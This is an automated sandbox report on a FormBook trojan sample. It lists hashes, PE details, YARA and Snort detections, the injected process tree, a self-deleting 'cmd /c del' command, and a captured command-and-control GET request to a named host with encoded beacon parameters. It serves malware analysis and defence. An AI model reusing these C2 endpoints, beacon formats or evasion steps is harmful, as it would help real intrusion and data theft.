                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@8/1@13/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 17.5% (good quality ratio 15.5%)
                                          • Quality average: 72.4%
                                          • Quality standard deviation: 32.4%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 125
                                          • Number of non-executed functions: 151
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.110.249
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes were analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528622/sample/S9yf6BkjhTQUbHE.exe

                                          Simulations

                                          Behavior and APIs

                                          Time | Type | Description
                                          15:12:29 | API Interceptor | 22x Sleep call for process: S9yf6BkjhTQUbHE.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          Match | Associated Sample Name / URL | Detection | Context
                                          23.106.123.249 | gJvdHdeawX.exe | malicious |
                                          23.106.123.249 | SecuriteInfo.com.Trojan.GenericKDZ.74048.21519.exe | malicious |
                                          23.106.123.249 | SecuriteInfo.com.Ransom.Stop.P6.19307.exe | malicious |
                                          23.106.123.249 | SecuriteInfo.com.W32.AIDetect.malware1.7393.exe | malicious |
                                          23.106.123.249 | SecuriteInfo.com.W32.AIDetect.malware1.2200.exe | malicious |
                                          23.106.123.249 | SecuriteInfo.com.W32.AIDetect.malware2.22585.exe | malicious |
                                          23.106.123.249 | ZcCHi8mKVk.exe | malicious |
                                          172.67.178.31 | 40rsuPoRyW.exe | malicious | www.anamentor.com/shjn/?sbWx=tv0gbh/Fir1M81j+EOOET4kbqB9H6LwHpkw5oua6kbgwj0sH1g9v33R+7+13J6QYFzuS&e0=s8Vty2Ip
                                          172.67.178.31 | DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx | malicious | www.anamentor.com/shjn/?lL=tv0gbh/Ais1I8lvyGOOET4kbqB9H6LwHpkop0tG7g7gxjFABywsjhzp84Y5xCLETQValQA==&NRX4i6=BxoHnNf8mX1

                                                        Domains


                                                        ASN


                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\S9yf6BkjhTQUbHE.exe.log
Process: C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2239
Entropy (8bit): 5.354287817410997
Encrypted: false
SSDEEP: 48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
MD5: 913D1EEA179415C6D08FB255AE42B99D
SHA1: E994C612C0596994AAE55FBCE35B7A4FBE312FD7
SHA-256: 473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
SHA-512: 768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
Malicious: true
Reputation: moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                                        Static File Info

                                                        General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.847097424496743
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: S9yf6BkjhTQUbHE.exe
File size: 446976
MD5: 812861ad5cbb91bfa01a6a15c2cef128
SHA1: ca092e52319047d609cb6fcca1821a8f873416df
SHA256: a649d216b55b0f0597a16690b8469b6b44b9cdc73560d8237387b2df225ab20b
SHA512: 67f95b15cf249be43324f73de874fc5ca2f2b1d7255c1bb99b6d103b8d9c7414ebbf3ce1bdf7bb9df225c020d79836985c89fa687049892fa6323c535579e05d
SSDEEP: 12288:iDW+U0QixBFmqI9AY9aVrwRn+BbxGmG5tquMAQ52RJeHEO:iDvU0Qi1hIhaVASx85tquMAQ52HdO
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QM.a..............0.............v.... ........@.. .......................@............@................................

                                                        File Icon

Icon Hash: 00828e8e8686b000

                                                        Static PE Info

                                                        General

Entrypoint: 0x46e776
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x619F4D51 [Thu Nov 25 08:46:09 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [ebp+0800000Eh], ch
                                                        add byte ptr [eax], al

                                                        Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x6e724          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x70000          0x5c4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x72000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                        Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x6c78c       0x6c800   False     0.884828629032   data       7.85954100497   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x70000          0x5c4         0x600     False     0.4296875        data       4.13698409708   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x72000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

Name         RVA      Size   Type                                                                            Language  Country
RT_VERSION   0x70090  0x334  data
RT_MANIFEST  0x703d4  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                        Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright Rogers Peet
Assembly Version  8.0.6.0
InternalName      InAttribu.exe
FileVersion       5.6.0.0
CompanyName       Rogers Peet
LegalTrademarks
Comments
ProductName       Biblan
ProductVersion    5.6.0.0
FileDescription   Biblan
OriginalFilename  InAttribu.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
11/25/21-15:14:49.156551  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49827        80         192.168.2.5  34.117.168.233
11/25/21-15:14:49.156551  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49827        80         192.168.2.5  34.117.168.233
11/25/21-15:14:49.156551  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49827        80         192.168.2.5  34.117.168.233
11/25/21-15:15:02.896670  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49837        80         192.168.2.5  198.54.117.218
11/25/21-15:15:02.896670  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49837        80         192.168.2.5  198.54.117.218
11/25/21-15:15:02.896670  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49837        80         192.168.2.5  198.54.117.218

                                                        TCP Packets


                                                        UDP Packets


                                                        DNS Queries


                                                        DNS Answers


                                                        HTTP Request Dependency Graph

                                                        • www.anamentor.com

                                                        HTTP Packets

                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        0 | 192.168.2.5 | 49825 | 172.67.178.31 | 80 | C:\Windows\explorer.exe

                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 25, 2021 15:14:27.703845978 CET | 11243 | OUT | GET /czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L HTTP/1.1
                                                        Host: www.anamentor.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Nov 25, 2021 15:14:27.778224945 CET | 11244 | IN | HTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 25 Nov 2021 14:14:27 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 25 Nov 2021 15:14:27 GMT
                                                        Location: https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RzIWNo2qqeDFO2t1MpA%2FOdaqEXCSt3i%2FGZmLkcZpm6f76Mci07Yzcq5ZRvSRwDOez1hTdzS4aWfPMe8ywl3LNUDv%2B4Z%2Fh5hPMNAVAwFYiHWORPRPU5x6BxLWPT9j1tYPoJT5TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 6b3b7bc73b736b36-AMS
                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Code Manipulations

                                                        System Behavior

                                                        General

                                                        Start time:15:12:27
                                                        Start date:25/11/2021
                                                        Path:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
                                                        Imagebase:0xa80000
                                                        File size:446976 bytes
                                                        MD5 hash:812861AD5CBB91BFA01A6A15C2CEF128
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:15:12:30
                                                        Start date:25/11/2021
                                                        Path:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        Imagebase:0x450000
                                                        File size:446976 bytes
                                                        MD5 hash:812861AD5CBB91BFA01A6A15C2CEF128
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:15:12:33
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff693d90000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high

                                                        General

                                                        Start time:15:12:58
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                        Imagebase:0x1080000
                                                        File size:851968 bytes
                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:15:12:58
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\SysWOW64\msdt.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\msdt.exe
                                                        Imagebase:0x9f0000
                                                        File size:1508352 bytes
                                                        MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Start time:15:13:02
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
                                                        Imagebase:0x150000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:15:13:04
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7ecfc0000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                          Executed Functions

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ="
                                                          • API String ID: 0-1535570552
                                                          • Opcode ID: db230c1d38c4774c697169a7c274e068883672b5dc6635b0bbdc79f1ca7444ec
                                                          • Instruction ID: f198d5ca3951e196e4c1a57ebcf10c805bfdd550a98cd34f5d8fba53e849d5df
                                                          • Opcode Fuzzy Hash: db230c1d38c4774c697169a7c274e068883672b5dc6635b0bbdc79f1ca7444ec
                                                          • Instruction Fuzzy Hash: 9B31D1353086509FC704AB64D81AA6E3FA6FB8A311F19846BF40ACB3D1DE78CC48D761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #N|
                                                          • API String ID: 0-2837251462
                                                          • Opcode ID: b9ce4acbec5e51077a4ebcb5222ee0f394c112ccae12f8efd68ae2821a555e35
                                                          • Instruction ID: 8016beee33093d502d47e327c0a8b4e3e9931ddb79806c9a226aa73bd5f84c5e
                                                          • Opcode Fuzzy Hash: b9ce4acbec5e51077a4ebcb5222ee0f394c112ccae12f8efd68ae2821a555e35
                                                          • Instruction Fuzzy Hash: A641D2B1D01618CBDB10CFE9C984ACDFBB5BF49304F24842AD409BB250E7756A4ACF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #N|
                                                          • API String ID: 0-2837251462
                                                          • Opcode ID: c2eac95d80eda94e57ead069fa128696dc610e703e974df82806af2107048474
                                                          • Instruction ID: b474276ebb5f6707d0e8b735d9772400485956bdfa337367d5befe8089031da8
                                                          • Opcode Fuzzy Hash: c2eac95d80eda94e57ead069fa128696dc610e703e974df82806af2107048474
                                                          • Instruction Fuzzy Hash: 6741C2B1D00618DBDB20CFE9C984ADEFBB5BF49304F248529D409BB250E7756A4ACF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #N|
                                                          • API String ID: 0-2837251462
                                                          • Opcode ID: 069e98df64a3057e824ded01c0dfb6f499bdb9360bfb99584c1eca20a8f2aeac
                                                          • Instruction ID: 024ce0e3549c7771f340a0a2dca54563af5ef9d727a7385d1d7312136bce8f72
                                                          • Opcode Fuzzy Hash: 069e98df64a3057e824ded01c0dfb6f499bdb9360bfb99584c1eca20a8f2aeac
                                                          • Instruction Fuzzy Hash: 7B31C0B0D05228DFDB20CF9AC588BCEBFB5BB49314F24846AE405BB680C7B59845CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #N|
                                                          • API String ID: 0-2837251462
                                                          • Opcode ID: fe99e0c206690af03df7114f67a2aa16f44471fa7be6c0690e784b603ec48b5a
                                                          • Instruction ID: fffd5c36952fff67eeb6c84ea4bfad5601875e5663510ec1862fd381524a1c45
                                                          • Opcode Fuzzy Hash: fe99e0c206690af03df7114f67a2aa16f44471fa7be6c0690e784b603ec48b5a
                                                          • Instruction Fuzzy Hash: 8531BFB0D01228DFDB20CF99C588BDEBBF5BB49314F64846AE405BB690C7B45845CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #N|
                                                          • API String ID: 0-2837251462
                                                          • Opcode ID: 5ae81ba8ca2942e737047e93ac9767145df26f0a4abe5b39c5d446254e6bbf58
                                                          • Instruction ID: 0ee5161dda307aecd4f0a03e7d95e03b1b2787f2e2febdc8833567ab0ab72d0a
                                                          • Opcode Fuzzy Hash: 5ae81ba8ca2942e737047e93ac9767145df26f0a4abe5b39c5d446254e6bbf58
                                                          • Instruction Fuzzy Hash: 0A1133B59002088FCB20CF99D488BDEFBF8FB49324F10885AD819A7340D774A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #N|
                                                          • API String ID: 0-2837251462
                                                          • Opcode ID: 0605d5f3c26cbb596ea54d94b987216b5ec9c3292bed55d69a6b94de9d103abd
                                                          • Instruction ID: 0f84364d97f8a06bf375736ad1a3fc3ada1e552ce6617d38c38b6a2cf5220cad
                                                          • Opcode Fuzzy Hash: 0605d5f3c26cbb596ea54d94b987216b5ec9c3292bed55d69a6b94de9d103abd
                                                          • Instruction Fuzzy Hash: 8A1133B59002088FCB20CF99C485BDEFBF8FB49324F24881AD559A7340D778A948CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ="
                                                          • API String ID: 0-1535570552
                                                          • Opcode ID: a775f5bdf079abf7afca4dc121936874135f1b0ad8944d1f90cc490e9c453d60
                                                          • Instruction ID: 4d3a871ebd550e33b9213d413716057d5e7b31abfb4a2e73b791374f8a3403d0
